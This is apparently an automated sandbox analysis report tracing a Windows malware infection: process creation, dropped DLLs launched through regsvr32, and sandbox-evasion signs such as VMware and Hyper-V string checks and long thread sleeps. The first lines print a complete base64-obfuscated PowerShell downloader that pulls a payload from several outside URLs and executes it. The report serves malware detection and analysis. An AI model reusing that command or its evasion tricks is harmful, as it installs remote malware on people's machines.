                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"Jump to behavior
                  Source: unknownProcess created: cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}""
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000C892 push ebp; retf 16_2_000000018000C895
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000D095 push B3B8007Eh; iretd 16_2_000000018000D09A
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000D0F3 push ebp; iretd 16_2_000000018000D0F4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180013551 push ebx; retf 16_2_0000000180013559
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000D15D push ebx; retn 0068h16_2_000000018000D15E
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000CDA8 push ebp; iretd 16_2_000000018000CDA9
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000CE36 push 458B0086h; iretd 16_2_000000018000CE3B
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180013551 push ebx; retf 17_2_0000000180013559
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65D00CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,16_2_00007FFC65D00CC0
                  Source: IKdzfJtQpj.BCP.2.drStatic PE information: real checksum: 0x654f5 should be: 0x60ea5
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJump to dropped file
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\AHWppkeB\tZBUnLQvw.dll (copy)Jump to dropped file
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\AHWppkeB\tZBUnLQvw.dll (copy)Jump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460Thread sleep count: 3984 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460Thread sleep count: 1628 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6972Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6180Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6236Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 6088Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 5452Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 5576Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_16-16499
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3984Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1628Jump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeAPI coverage: 9.1 %
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,17_2_00000001800248B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_16-16500
                  Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_16-16658
                  Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: powershell.exe, 00000002.00000003.314531683.0000000007C68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.314599281.0000000007CA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                  Source: powershell.exe, 00000002.00000003.299265609.00000000055B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.321229608.00000000052DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
                  Source: svchost.exe, 00000013.00000002.506415446.0000025912461000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@Hyper-V RAW
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                  Source: svchost.exe, 00000016.00000002.436665158.0000019AC5CF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                  Source: svchost.exe, 0000001D.00000002.506472989.0000021041C58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1ized
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                  Source: svchost.exe, 00000007.00000002.503991655.0000013648C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                  Source: regsvr32.exe, 00000011.00000003.391691578.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504289621.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.504833353.000002590CC29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.506373657.0000025912449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436651774.0000019AC5CED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.431270791.0000019AC5C80000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436453296.0000019AC5C80000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.505261417.0000021040CC7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.504593102.0000021040C2E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.504871113.0000021040C5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                  Source: svchost.exe, 0000001D.00000002.506472989.0000021041C58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.ed
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                  Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: svchost.exe, 0000001D.00000002.506067647.0000021041534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
                  Source: svchost.exe, 00000007.00000002.504260909.0000013648C28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.504324555.000002495A829000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: powershell.exe, 00000002.00000003.299265609.00000000055B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.321229608.00000000052DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CFBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FFC65CFBE50
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65D00215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,16_2_00007FFC65D00215
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65D00CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,16_2_00007FFC65D00CC0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CFBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FFC65CFBE50
